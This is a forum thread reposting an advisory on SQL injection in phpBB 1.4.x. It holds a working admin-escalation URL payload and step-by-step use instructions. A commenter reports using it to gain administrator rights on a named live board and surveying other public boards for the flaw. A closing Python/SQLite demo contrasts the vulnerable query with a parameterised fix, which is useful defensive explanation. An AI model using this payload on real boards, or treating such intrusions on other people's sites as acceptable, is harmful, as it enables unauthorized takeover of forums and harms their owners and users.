anight
Newbie
phpBB 1.4.x exploit
Last night this came through on bugtraq:
-New phpBB 1.4.x exploit
phpBB is an open source bulletin board created by the
phpBB group. Version 1.4.x of phpBB has a variable input
validation problem that can lead to limited arbitrary sql
queries including gaining administrative access to the board.
The problem lies in the fact that phpBB 1.4.x includes an
algorithm in the auth.php file which removes backslashes
that php automatically adds to GPC (Get/Post/Cookie)
variables.
<Example code from auth.php>
if(get_magic_quotes_gpc() == 1)
{
    switch($REQUEST_METHOD){
        case "POST":
            // PHP 4 idioms: $HTTP_POST_VARS and each() (both removed in later PHP)
            while (list ($key, $val) = each ($HTTP_POST_VARS)){
                if( is_array($val) ){
                    array_walk($val, 'stripslashes_array', '');
                    // creates a global variable named after the request key,
                    // with the backslashes magic_quotes added stripped again
                    $$key = $val;
                }
                else{
                    $$key = stripslashes($val);
                }
            }
            break;
        // the excerpt ends here; the advisory describes the same
        // stripping for GET and cookie variables
    }
}
</ End example code>
Therefore, certain php variables submitted through a URL
can reach an sql query with unescaped quotes, which is
not good for security reasons. In the prefs.php file such
a situation exists where a user can execute an arbitrary
query by supplying a certain value for the $viewemail
variable.
< Example sql query in prefs.php >
$sql = "UPDATE users SET
user_viewemail='$viewemail',
user_theme='$themes', user_attachsig = '$sig',
user_desmile = '$smile', user_html = '$dishtml',
user_bbcode = '$disbbcode', user_lang = '$lang' WHERE
(user_id = '$userdata[user_id]')";
</ End example code >
Example URL gives a username "l337h4x0r" level 4
(administrative) privileges on the board:
<Example URL>
http://sitename/phpBBfolder/prefs.php?save=1&viewemail=1',user_level%3D'4'%20where%20username%3D'l337h4x0r'%23
</ End example URL>
Summary:
1. Register an account on a phpBB board version 1.4.x.
2. Enter above URL with the correct sitename and replace l337h4x0r with your username.
3. Click on "Administration Panel" near the bottom of the page.
found by: [email protected]
http://www.modernhacker.com
--------------------------------------------
comments:
--------------------------------------------
Personally, I don't agree that the problem is in auth.php;
rather, it would be a good idea to add addslashes() in the query.
The site Offtopic32.phpclub.net is vulnerable to this; I got administrator rights there, but couldn't "take over the place", since the /admin directory is apparently additionally protected by .htaccess - well done!
phptalk.unet.ru/phpBB/ is not vulnerable to this... apparently addslashes() has been added to the query there. - congratulations
All the other phpBB bulletin boards that I found on Yandex are vulnerable.
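As an added example (not code from the advisory or from this thread), here is the prefs.php UPDATE pattern rebuilt in Python on an in-memory SQLite table, with the string-built query next to a parameterised one, to show why binding the value fixes the bug independently of what magic_quotes or stripslashes did. The table, rows and user ids are constructed for the demo; the payload is the advisory's viewemail value with the MySQL `#` comment replaced by `-- `, since SQLite does not treat `#` as a comment.

```python
import sqlite3

# Schema and rows are constructed for this demo; they are not phpBB's real table.
def make_board():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (user_id INTEGER, username TEXT,"
        " user_viewemail TEXT, user_level INTEGER)"
    )
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?, ?)",
        [(1, "admin", "0", 4), (2, "l337h4x0r", "0", 0)],
    )
    return conn


def save_prefs_vulnerable(conn, user_id, viewemail):
    # Same shape as prefs.php: the request value is pasted into the SQL text,
    # so a quote inside it ends the literal and the rest is parsed as SQL.
    sql = (f"UPDATE users SET user_viewemail='{viewemail}' "
           f"WHERE (user_id = '{user_id}')")
    conn.execute(sql)
    conn.commit()


def save_prefs_fixed(conn, user_id, viewemail):
    # Bound parameter: the value never enters the SQL text, so quotes and
    # comment markers in it are stored as data regardless of escaping.
    conn.execute(
        "UPDATE users SET user_viewemail = ? WHERE user_id = ?",
        (viewemail, user_id),
    )
    conn.commit()


def user_row(conn, username):
    return conn.execute(
        "SELECT user_viewemail, user_level FROM users WHERE username = ?",
        (username,),
    ).fetchone()


# The advisory's viewemail value, with MySQL's '#' comment swapped for '-- '
# so that SQLite also discards the original WHERE clause.
PAYLOAD = "1',user_level='4' WHERE username='l337h4x0r'-- "


def demo():
    vuln, fixed = make_board(), make_board()
    save_prefs_vulnerable(vuln, 2, PAYLOAD)   # ordinary user, id 2
    save_prefs_fixed(fixed, 2, PAYLOAD)
    return {"vulnerable": user_row(vuln, "l337h4x0r"),
            "fixed": user_row(fixed, "l337h4x0r")}
```

With the string-built query the ordinary user ends up at level 4; with the bound parameter the same value is stored verbatim in user_viewemail and the level stays 0, which is why parameter binding is the fix to prefer over adding addslashes() to each query.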